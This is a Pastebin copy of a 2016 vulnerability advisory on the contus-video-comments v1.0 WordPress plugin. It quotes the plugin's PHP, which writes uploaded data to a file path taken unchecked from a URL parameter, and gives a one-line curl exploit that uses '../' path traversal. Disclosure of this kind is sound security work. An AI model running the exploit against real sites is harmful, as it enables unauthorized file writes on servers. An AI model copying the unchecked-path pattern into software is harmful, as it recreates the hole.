Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Title: Unauthenticated remote .jpg file upload in contus-video-comments v1.0 wordpress plugin
- Author: Larry W. Cashdollar, @_larry0
- Date: 2016-06-15
- Download Site: https://wordpress.org/plugins/contus-video-comments/
- Vendor: https://profiles.wordpress.org/hdflvplayer/
- Vendor Notified: 2016-06-16
- Vendor Contact:
- Description: Video comments integrated with the standard comment system of wordpress.
- Vulnerability:
- The following code allows any user to upload .jpg files to the WordPress installation. It also allows path traversal with ../.
- <?php
- //This project is done by vamapaull: http://blog.vamapaull.com/
- //The php code is done with some help from Mihai Bojin: http://www.mihaibojin.com/
- if(isset($GLOBALS["HTTP_RAW_POST_DATA"])){
- $jpg = $GLOBALS["HTTP_RAW_POST_DATA"];
- $filename = "images/". $_GET["id"]. ".jpg";
- file_put_contents($filename, $jpg);
- } else{
- echo "Encoded JPEG information not received.";
- }
- ?>
- CVE-TBD
- Exploit Code:
- • $ curl --data @image.jpg "http://wp-site/wp-content/plugins/contus-video-comments/save.php?id=../image"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement